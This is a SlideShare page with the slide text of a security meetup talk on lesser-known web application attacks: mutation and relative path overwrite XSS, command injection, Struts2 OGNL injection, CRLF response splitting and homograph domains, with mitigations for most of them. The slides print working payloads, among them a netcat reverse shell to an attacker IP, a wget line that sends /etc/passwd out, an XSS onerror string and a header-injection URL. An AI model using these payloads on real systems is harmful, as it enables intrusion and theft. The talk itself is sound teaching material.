SlideShare a Scribd company logo

Null 14 may_lesser_known_attacks_by_ninadsarang

Ninad Sarang
Ninad Sarang

The document summarizes several lesser-known web application attacks. It discusses mutation cross-site scripting (XSS), relative path overwrite XSS, zombie XSS, remote command execution, carriage return line feed (CRLF) attacks, and homograph attacks. For each attack, it provides examples of how the attack works and potential mitigations. The overall document serves as a guide to understanding and defending against these more obscure web application vulnerabilities.

Technology
1 of 29
Lesser Known Attacks Webapp By Ninad Sarang
LesserKnownWebAppAttacks About me   Consultant atAujas Networks  Part time bug hunter  Individual Security researcher  Blogger http://infinite8security.blogspot.in
LesserKnownWebAppAttacks Menu Card Cross site scripting –  Mutation XSS  RPO XSS  Zombie XSS Remote Command Execution CR-LF Attack Homograph Attack
It’s all about PoPuP LesserKnownWebAppAttacks Cross site Scripting- Mutation XSS
LesserKnownWebAppAttacks  HTML encoded payload <listing>&lt;img src=1 onerror=alert(1)&gt;</listing>  we will put this piece of code into another code using innerHTML property. <listing id=x>&lt;img src=1 onerror=alert(1)&gt;</listing> <script>alert(document.getElementById('x').innerHTML)</script>  When this code will execute, browser will read innerHTML and call document.getElementById(‘x’)  Resulting in multiple level of decoding and mutate from safe to unsafe state.
LesserKnownWebAppAttacks
LesserKnownWebAppAttacks
LesserKnownWebAppAttacks Mitigation: Server-side mitigation • Avoiding outputting server content otherwise incorrectly converted by the browser. • The flawed content should be replaced with semantically equivalent content which is converted properly by the browser. Client-side mitigation • Browsers should implement ECMA Script 5 and higher. • TrueHTML: TrueHTML relies on the XMLSerializer DOM object provided by all of the user agents. • https://cure53.de/fp170.pdf
LesserKnownWebAppAttacks Cross site Scripting- RPO XSS Relative path Overwrite xss • Difference between Absolute and Relative url • Absolute URL: https://thehacker.co.in/test • Relative URL: test/some_subdirectory To exploit this findings three things are necessary, 1) stored XSS that allows CSS injection. 2) URL Rewriting. 3) Relative addressing to CSS style sheet.
LesserKnownWebAppAttacks D E M O • Step 1: Lets visit www.webdevelopersnotes.com/graphics/index.php3 • To check URL re-writing add ‘/’ • Open re-writed url with xss payloadin IE and see the Magic ;) • http://challenge.hackvertor.co.uk/ xss_horror_show/chapter7/rpo.php/ Mitigation: • It is recommended that absolute URLs should be used throughout a site. • Otherwise relative root url should be used.
LesserKnownWebAppAttacks Cross site Scripting- Zombie XSS
LesserKnownWebAppAttacks Cross site Scripting- Zombie XSS
LesserKnownWebAppAttacks
www.nsa.gov && nc -vn 192.168.254.128 4444 -e /bin/bash Remote/OS Command Execution LesserKnownWebAppAttacks
LesserKnownWebAppAttacks Now what if ( ; ) is blocked by the application?  X ;Y = Seperating Commands (Run X and then Y, regardless of success of X)  X |Y = PIPE (Run X and pass output of X toY)  X ^Y = PIPEZ  X &&Y =AND (RunYif X succeeded )  FAIL||Y = OR (RunYif X failed)  X %0D Y%0D Z = OR  ` X ` = Backtick  ` X &Y` = Background (RunYand then run X in background, regardless of success of X)  $( command )  nc -e /bin/sh = Netcat  wget --post-file /etc/passwd = WGET
LesserKnownWebAppAttacks RCE never dies!!! • "action:", "redirect:" or "redirectAction:" is not properly sanitized. • information will be evaluated as OGNL (Object-Graph Navigation Language) expression against the value stack, this introduces the possibility to inject server side code. Apache struts2 RCE http://host/struts2- blank/example/X.action?action:${3*4}
LesserKnownWebAppAttacks D E M O
LesserKnownWebAppAttacks Divide and Conquer cR-LFAttack • CR stands for Carriage Return (CR,ASCII 13, r) • LF stands for Line feed (LF, ASCII 10, n) How this Attack work? The server script embeds user data in HTTP response headers. Example: Step1: There is redirection page “redir_lang.jsp” When we hit index page server responds with following response <% response.sendRedirect("/by_lang.jsp?lang="+ request.getParameter("lang")); %>
LesserKnownWebAppAttacks Divide and Conquer cR-LFAttack
LesserKnownWebAppAttacks Lets Attack ;) Step 3: Instead of passing value as English. Lets pass our attack vector as shown. /redir_lang.jsp?lang=foobar%0d%0aContentLength :%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aCont entType:%20text/html%0d%0aContentLength:%2019% 0d%0a%0d%0a<html>Shazam</html> Note: We have URLencoded the CRLF sequences Lets see what server responds with 
LesserKnownWebAppAttacks A first HTTP response, which is a 302 (redirection) response. A second HTTP response, which is a 200 response, with a content comprising of 19 bytes of HTML. Superfluous data
So when the attacker feeds the target with two requests, the first being to the URL /redir_lang.jsp?lang=foobar%0d%0aContentLength:%200%0d%0a%0d% 0aHTTP/1.1%20200%20OK%0d%0aContentType:%20text/html%0d%0aCont entLength:%2019%0d%0a%0d%0a<html>Shazam</html> And the second to the URL > /index.html The target would believe that the first request is matched to the first response: And the second request (to /index.html) is matched to the second response: LesserKnownWebAppAttacks
What Attacker can do by CRLF attack?  Cross site scripting >> http://blog.innerht.ml/twitter-crlf-injection  Web Cache Poisoning (defacement)  Cross User attacks (single user, single page, temporary defacement)  Hijacking pages with user-specific information  Browser cache poisoning LesserKnownWebAppAttacks
LesserKnownWebAppAttacks Homograph Attack Can you tell the difference? 1) https://ebаy.com/ 2) https://ebay.com/
LesserKnownWebAppAttacks https://ebаy.com/ https://ebay.com/
LesserKnownWebAppAttacks What is this all about? http://ebаy.com/ Decoding to punycode http://xn--eby-7cd.com/ Cyrillic alphabets
LesserKnownWebAppAttacks What Attacker can do by Homograph attack?  Phishing  Un-validated Redirection  Fake websites  Attacker may combine this with SSLattacks http://www.blackhat.com/presentations/bh-dc- 09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf
Mitigation LesserKnownWebAppAttacks Before After
Thank You Reach me @ LinkedIn: Ninad Sarang Twitter: @hbkninad

Recommended

Brakeman
BrakemanBrakeman
BrakemanRomain Sempé
 
Superfast Automated Web Testing with CasperJS & PhantomJS
Superfast Automated Web Testing with CasperJS & PhantomJS Superfast Automated Web Testing with CasperJS & PhantomJS
Superfast Automated Web Testing with CasperJS & PhantomJS
Hervé Vũ Roussel
 
Sinatra Rack And Middleware
Sinatra Rack And MiddlewareSinatra Rack And Middleware
Sinatra Rack And Middleware
Ben Schwarz
 
CasperJs Enjoy Functional Testing
CasperJs Enjoy Functional TestingCasperJs Enjoy Functional Testing
CasperJs Enjoy Functional Testing
Fabien POMEROL
 
Like a Genie from a Lamp: Headless JavaScript Unit Testing with Jasmine and P...
Like a Genie from a Lamp: Headless JavaScript Unit Testing with Jasmine and P...Like a Genie from a Lamp: Headless JavaScript Unit Testing with Jasmine and P...
Like a Genie from a Lamp: Headless JavaScript Unit Testing with Jasmine and P...
Rob Friesel
 
6.2. Hacking most popular websites
6.2. Hacking most popular websites6.2. Hacking most popular websites
6.2. Hacking most popular websites
defconmoscow
 
Sinatra for REST services
Sinatra for REST servicesSinatra for REST services
Sinatra for REST services
Emanuele DelBono
 
Site Testing with CasperJS
Site Testing with CasperJSSite Testing with CasperJS
Site Testing with CasperJSJoseph Scott
 

Recommended

Brakeman
BrakemanBrakeman
BrakemanRomain Sempé
 
Superfast Automated Web Testing with CasperJS & PhantomJS
Superfast Automated Web Testing with CasperJS & PhantomJS Superfast Automated Web Testing with CasperJS & PhantomJS
Superfast Automated Web Testing with CasperJS & PhantomJS
Hervé Vũ Roussel
 
Sinatra Rack And Middleware
Sinatra Rack And MiddlewareSinatra Rack And Middleware
Sinatra Rack And Middleware
Ben Schwarz
 
CasperJs Enjoy Functional Testing
CasperJs Enjoy Functional TestingCasperJs Enjoy Functional Testing
CasperJs Enjoy Functional Testing
Fabien POMEROL
 
Like a Genie from a Lamp: Headless JavaScript Unit Testing with Jasmine and P...
Like a Genie from a Lamp: Headless JavaScript Unit Testing with Jasmine and P...Like a Genie from a Lamp: Headless JavaScript Unit Testing with Jasmine and P...
Like a Genie from a Lamp: Headless JavaScript Unit Testing with Jasmine and P...
Rob Friesel
 
6.2. Hacking most popular websites
6.2. Hacking most popular websites6.2. Hacking most popular websites
6.2. Hacking most popular websites
defconmoscow
 
Sinatra for REST services
Sinatra for REST servicesSinatra for REST services
Sinatra for REST services
Emanuele DelBono
 
Site Testing with CasperJS
Site Testing with CasperJSSite Testing with CasperJS
Site Testing with CasperJSJoseph Scott
 
Ultra fast web development with sinatra
Ultra fast web development with sinatraUltra fast web development with sinatra
Ultra fast web development with sinatra
Sérgio Santos
 
Testing MeteorJS using CasperJS
Testing MeteorJS using CasperJSTesting MeteorJS using CasperJS
Testing MeteorJS using CasperJS
Stephan Hochhaus
 
CasperJS and PhantomJS for Automated Testing
CasperJS and PhantomJS for Automated TestingCasperJS and PhantomJS for Automated Testing
CasperJS and PhantomJS for Automated Testing
X-Team
 
ZendCon 2017 - Build a Bot Workshop - Async Primer
ZendCon 2017 - Build a Bot Workshop - Async PrimerZendCon 2017 - Build a Bot Workshop - Async Primer
ZendCon 2017 - Build a Bot Workshop - Async Primer
Adam Englander
 
Sprockets
SprocketsSprockets
Sprockets
Tim Novinger
 
Using Sinatra to Build REST APIs in Ruby
Using Sinatra to Build REST APIs in RubyUsing Sinatra to Build REST APIs in Ruby
Using Sinatra to Build REST APIs in Ruby
LaunchAny
 
Html5, css3, canvas, svg and webgl
Html5, css3, canvas, svg and webglHtml5, css3, canvas, svg and webgl
Html5, css3, canvas, svg and webgl
Kilian Valkhof
 
Advanced Jasmine
Advanced JasmineAdvanced Jasmine
Advanced Jasmine
jbellsey
 
Rails Presentation (Anton Dmitriyev)
Rails Presentation (Anton Dmitriyev)Rails Presentation (Anton Dmitriyev)
Rails Presentation (Anton Dmitriyev)True-Vision
 
CasperJS
CasperJSCasperJS
CasperJSLearningTech
 
Lightweight Webservices with Sinatra and RestClient
Lightweight Webservices with Sinatra and RestClientLightweight Webservices with Sinatra and RestClient
Lightweight Webservices with Sinatra and RestClient
Adam Wiggins
 
Selenium sandwich-2
Selenium sandwich-2Selenium sandwich-2
Selenium sandwich-2
Workhorse Computing
 
14 Jan17- Nullmeets -Blockchain concept decoded by Ninad Sarang
14 Jan17- Nullmeets -Blockchain concept decoded by Ninad Sarang14 Jan17- Nullmeets -Blockchain concept decoded by Ninad Sarang
14 Jan17- Nullmeets -Blockchain concept decoded by Ninad Sarang
Ninad Sarang
 
NullCon 2012 - Ra.2: blackbox DOM-based XSS scanner
NullCon 2012 - Ra.2: blackbox DOM-based XSS scannerNullCon 2012 - Ra.2: blackbox DOM-based XSS scanner
NullCon 2012 - Ra.2: blackbox DOM-based XSS scanner
Nishant Das Patnaik
 
Adversarial machine learning
Adversarial machine learningAdversarial machine learning
Adversarial machine learning
Kaushal Parikh
 
Blockchains 101
Blockchains 101Blockchains 101
Blockchains 101
Nikhil Krishna Nair
 
Block chain health record
Block chain health recordBlock chain health record
Block chain health record
Charles Moore
 
Bitcoin and our Decentralized Future
Bitcoin and our Decentralized FutureBitcoin and our Decentralized Future
Bitcoin and our Decentralized Future
James L. Walpole
 
Null Mumbai 14th May Lesser Known Webapp attacks by Ninad Sarang
Null Mumbai 14th May Lesser Known Webapp attacks by Ninad SarangNull Mumbai 14th May Lesser Known Webapp attacks by Ninad Sarang
Null Mumbai 14th May Lesser Known Webapp attacks by Ninad Sarang
nullowaspmumbai
 
Smart contracts
Smart contractsSmart contracts
Smart contracts
Philippe Camacho, Ph.D.
 
Distributed ledger technology: beyond block chain
Distributed ledger technology: beyond block chainDistributed ledger technology: beyond block chain
Distributed ledger technology: beyond block chain
bis_foresight
 
Block Chain Basics
Block Chain BasicsBlock Chain Basics
Block Chain Basics
University of Hertfordshire
 

More Related Content

What's hot

Ultra fast web development with sinatra
Ultra fast web development with sinatraUltra fast web development with sinatra
Ultra fast web development with sinatra
Sérgio Santos
 
Testing MeteorJS using CasperJS
Testing MeteorJS using CasperJSTesting MeteorJS using CasperJS
Testing MeteorJS using CasperJS
Stephan Hochhaus
 
CasperJS and PhantomJS for Automated Testing
CasperJS and PhantomJS for Automated TestingCasperJS and PhantomJS for Automated Testing
CasperJS and PhantomJS for Automated Testing
X-Team
 
ZendCon 2017 - Build a Bot Workshop - Async Primer
ZendCon 2017 - Build a Bot Workshop - Async PrimerZendCon 2017 - Build a Bot Workshop - Async Primer
ZendCon 2017 - Build a Bot Workshop - Async Primer
Adam Englander
 
Sprockets
SprocketsSprockets
Sprockets
Tim Novinger
 
Using Sinatra to Build REST APIs in Ruby
Using Sinatra to Build REST APIs in RubyUsing Sinatra to Build REST APIs in Ruby
Using Sinatra to Build REST APIs in Ruby
LaunchAny
 
Html5, css3, canvas, svg and webgl
Html5, css3, canvas, svg and webglHtml5, css3, canvas, svg and webgl
Html5, css3, canvas, svg and webgl
Kilian Valkhof
 
Advanced Jasmine
Advanced JasmineAdvanced Jasmine
Advanced Jasmine
jbellsey
 
Rails Presentation (Anton Dmitriyev)
Rails Presentation (Anton Dmitriyev)Rails Presentation (Anton Dmitriyev)
Rails Presentation (Anton Dmitriyev)True-Vision
 
Lightweight Webservices with Sinatra and RestClient
Lightweight Webservices with Sinatra and RestClientLightweight Webservices with Sinatra and RestClient
Lightweight Webservices with Sinatra and RestClient
Adam Wiggins
 
Selenium sandwich-2
Selenium sandwich-2Selenium sandwich-2
Selenium sandwich-2
Workhorse Computing
 

What's hot (12)

Ultra fast web development with sinatra
Ultra fast web development with sinatraUltra fast web development with sinatra
Ultra fast web development with sinatra
 
Testing MeteorJS using CasperJS
Testing MeteorJS using CasperJSTesting MeteorJS using CasperJS
Testing MeteorJS using CasperJS
 
CasperJS and PhantomJS for Automated Testing
CasperJS and PhantomJS for Automated TestingCasperJS and PhantomJS for Automated Testing
CasperJS and PhantomJS for Automated Testing
 
ZendCon 2017 - Build a Bot Workshop - Async Primer
ZendCon 2017 - Build a Bot Workshop - Async PrimerZendCon 2017 - Build a Bot Workshop - Async Primer
ZendCon 2017 - Build a Bot Workshop - Async Primer
 
Sprockets
SprocketsSprockets
Sprockets
 
Using Sinatra to Build REST APIs in Ruby
Using Sinatra to Build REST APIs in RubyUsing Sinatra to Build REST APIs in Ruby
Using Sinatra to Build REST APIs in Ruby
 
Html5, css3, canvas, svg and webgl
Html5, css3, canvas, svg and webglHtml5, css3, canvas, svg and webgl
Html5, css3, canvas, svg and webgl
 
Advanced Jasmine
Advanced JasmineAdvanced Jasmine
Advanced Jasmine
 
Rails Presentation (Anton Dmitriyev)
Rails Presentation (Anton Dmitriyev)Rails Presentation (Anton Dmitriyev)
Rails Presentation (Anton Dmitriyev)
 
CasperJS
CasperJSCasperJS
CasperJS
 
Lightweight Webservices with Sinatra and RestClient
Lightweight Webservices with Sinatra and RestClientLightweight Webservices with Sinatra and RestClient
Lightweight Webservices with Sinatra and RestClient
 
Selenium sandwich-2
Selenium sandwich-2Selenium sandwich-2
Selenium sandwich-2
 

Viewers also liked

14 Jan17- Nullmeets -Blockchain concept decoded by Ninad Sarang
14 Jan17- Nullmeets -Blockchain concept decoded by Ninad Sarang14 Jan17- Nullmeets -Blockchain concept decoded by Ninad Sarang
14 Jan17- Nullmeets -Blockchain concept decoded by Ninad Sarang
Ninad Sarang
 
NullCon 2012 - Ra.2: blackbox DOM-based XSS scanner
NullCon 2012 - Ra.2: blackbox DOM-based XSS scannerNullCon 2012 - Ra.2: blackbox DOM-based XSS scanner
NullCon 2012 - Ra.2: blackbox DOM-based XSS scanner
Nishant Das Patnaik
 
Adversarial machine learning
Adversarial machine learningAdversarial machine learning
Adversarial machine learning
Kaushal Parikh
 
Blockchains 101
Blockchains 101Blockchains 101
Blockchains 101
Nikhil Krishna Nair
 
Block chain health record
Block chain health recordBlock chain health record
Block chain health record
Charles Moore
 
Bitcoin and our Decentralized Future
Bitcoin and our Decentralized FutureBitcoin and our Decentralized Future
Bitcoin and our Decentralized Future
James L. Walpole
 
Null Mumbai 14th May Lesser Known Webapp attacks by Ninad Sarang
Null Mumbai 14th May Lesser Known Webapp attacks by Ninad SarangNull Mumbai 14th May Lesser Known Webapp attacks by Ninad Sarang
Null Mumbai 14th May Lesser Known Webapp attacks by Ninad Sarang
nullowaspmumbai
 
Smart contracts
Smart contractsSmart contracts
Smart contracts
Philippe Camacho, Ph.D.
 
Distributed ledger technology: beyond block chain
Distributed ledger technology: beyond block chainDistributed ledger technology: beyond block chain
Distributed ledger technology: beyond block chain
bis_foresight
 
Block Chain Basics
Block Chain BasicsBlock Chain Basics
Block Chain Basics
University of Hertfordshire
 
Introduction to bitcoin
Introduction to bitcoinIntroduction to bitcoin
Introduction to bitcoinWolf McNally
 

Viewers also liked (11)

14 Jan17- Nullmeets -Blockchain concept decoded by Ninad Sarang
14 Jan17- Nullmeets -Blockchain concept decoded by Ninad Sarang14 Jan17- Nullmeets -Blockchain concept decoded by Ninad Sarang
14 Jan17- Nullmeets -Blockchain concept decoded by Ninad Sarang
 
NullCon 2012 - Ra.2: blackbox DOM-based XSS scanner
NullCon 2012 - Ra.2: blackbox DOM-based XSS scannerNullCon 2012 - Ra.2: blackbox DOM-based XSS scanner
NullCon 2012 - Ra.2: blackbox DOM-based XSS scanner
 
Adversarial machine learning
Adversarial machine learningAdversarial machine learning
Adversarial machine learning
 
Blockchains 101
Blockchains 101Blockchains 101
Blockchains 101
 
Block chain health record
Block chain health recordBlock chain health record
Block chain health record
 
Bitcoin and our Decentralized Future
Bitcoin and our Decentralized FutureBitcoin and our Decentralized Future
Bitcoin and our Decentralized Future
 
Null Mumbai 14th May Lesser Known Webapp attacks by Ninad Sarang
Null Mumbai 14th May Lesser Known Webapp attacks by Ninad SarangNull Mumbai 14th May Lesser Known Webapp attacks by Ninad Sarang
Null Mumbai 14th May Lesser Known Webapp attacks by Ninad Sarang
 
Smart contracts
Smart contractsSmart contracts
Smart contracts
 
Distributed ledger technology: beyond block chain
Distributed ledger technology: beyond block chainDistributed ledger technology: beyond block chain
Distributed ledger technology: beyond block chain
 
Block Chain Basics
Block Chain BasicsBlock Chain Basics
Block Chain Basics
 
Introduction to bitcoin
Introduction to bitcoinIntroduction to bitcoin
Introduction to bitcoin
 

Similar to Null 14 may_lesser_known_attacks_by_ninadsarang

Application Security for RIAs
Application Security for RIAsApplication Security for RIAs
Application Security for RIAs
johnwilander
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web AppsFrank Kim
 
XSS Primer - Noob to Pro in 1 hour
XSS Primer - Noob to Pro in 1 hourXSS Primer - Noob to Pro in 1 hour
XSS Primer - Noob to Pro in 1 hour
snoopythesecuritydog
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encoding
Eoin Keary
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
Xss mitigation php [Repaired]
Xss mitigation php [Repaired]Xss mitigation php [Repaired]
Xss mitigation php [Repaired]Tinashe Makuti
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshop
testuser1223
 
Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)
Susam Pal
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
Damon Cortesi
 
Application Security for Rich Internet Applicationss (Jfokus 2012)
Application Security for Rich Internet Applicationss (Jfokus 2012)Application Security for Rich Internet Applicationss (Jfokus 2012)
Application Security for Rich Internet Applicationss (Jfokus 2012)
johnwilander
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
abhijitapatil
 
Mitigating CSRF with two lines of codes
Mitigating CSRF with two lines of codesMitigating CSRF with two lines of codes
Mitigating CSRF with two lines of codes
Minhaz A V
 
Complete xss walkthrough
Complete xss walkthroughComplete xss walkthrough
Complete xss walkthrough
Ahmed Elhady Mohamed
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법guestad13b55
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
Brad Hill
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
Carol McDonald
 
"Подход к написанию безопасного клиентского кода на примере React", Иван Елки...
"Подход к написанию безопасного клиентского кода на примере React", Иван Елки..."Подход к написанию безопасного клиентского кода на примере React", Иван Елки...
"Подход к написанию безопасного клиентского кода на примере React", Иван Елки...
MoscowJS
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application SecurityChris x-MS
 
Waf.js: How to Protect Web Applications using JavaScript
Waf.js: How to Protect Web Applications using JavaScriptWaf.js: How to Protect Web Applications using JavaScript
Waf.js: How to Protect Web Applications using JavaScript
Denis Kolegov
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
Samvel Gevorgyan
 

Similar to Null 14 may_lesser_known_attacks_by_ninadsarang (20)

Application Security for RIAs
Application Security for RIAsApplication Security for RIAs
Application Security for RIAs
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web Apps
 
XSS Primer - Noob to Pro in 1 hour
XSS Primer - Noob to Pro in 1 hourXSS Primer - Noob to Pro in 1 hour
XSS Primer - Noob to Pro in 1 hour
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encoding
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
 
Xss mitigation php [Repaired]
Xss mitigation php [Repaired]Xss mitigation php [Repaired]
Xss mitigation php [Repaired]
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshop
 
Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)Top 10 Security Vulnerabilities (2006)
Top 10 Security Vulnerabilities (2006)
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
Application Security for Rich Internet Applicationss (Jfokus 2012)
Application Security for Rich Internet Applicationss (Jfokus 2012)Application Security for Rich Internet Applicationss (Jfokus 2012)
Application Security for Rich Internet Applicationss (Jfokus 2012)
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
 
Mitigating CSRF with two lines of codes
Mitigating CSRF with two lines of codesMitigating CSRF with two lines of codes
Mitigating CSRF with two lines of codes
 
Complete xss walkthrough
Complete xss walkthroughComplete xss walkthrough
Complete xss walkthrough
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
 
"Подход к написанию безопасного клиентского кода на примере React", Иван Елки...
"Подход к написанию безопасного клиентского кода на примере React", Иван Елки..."Подход к написанию безопасного клиентского кода на примере React", Иван Елки...
"Подход к написанию безопасного клиентского кода на примере React", Иван Елки...
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
Waf.js: How to Protect Web Applications using JavaScript
Waf.js: How to Protect Web Applications using JavaScriptWaf.js: How to Protect Web Applications using JavaScript
Waf.js: How to Protect Web Applications using JavaScript
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
 

Recently uploaded

Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
Cheryl Hung
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
Thijs Feryn
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
ThousandEyes
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Product School
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
BookNet Canada
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
DianaGray10
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
Safe Software
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
Product School
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance
 
By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024
Pierluigi Pugliese
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
Jemma Hussein Allen
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
James Anderson
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........
Alison B. Lowndes
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance
 
Introduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - CybersecurityIntroduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - Cybersecurity
mikeeftimakis1
 
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance
 
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Thierry Lestable
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
sonjaschweigert1
 
Welocme to ViralQR, your best QR code generator.
Welocme to ViralQR, your best QR code generator.Welocme to ViralQR, your best QR code generator.
Welocme to ViralQR, your best QR code generator.
ViralQR
 
Free Complete Python - A step towards Data Science
Free Complete Python - A step towards Data ScienceFree Complete Python - A step towards Data Science
Free Complete Python - A step towards Data Science
RinaMondal9
 

Recently uploaded (20)

Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
 
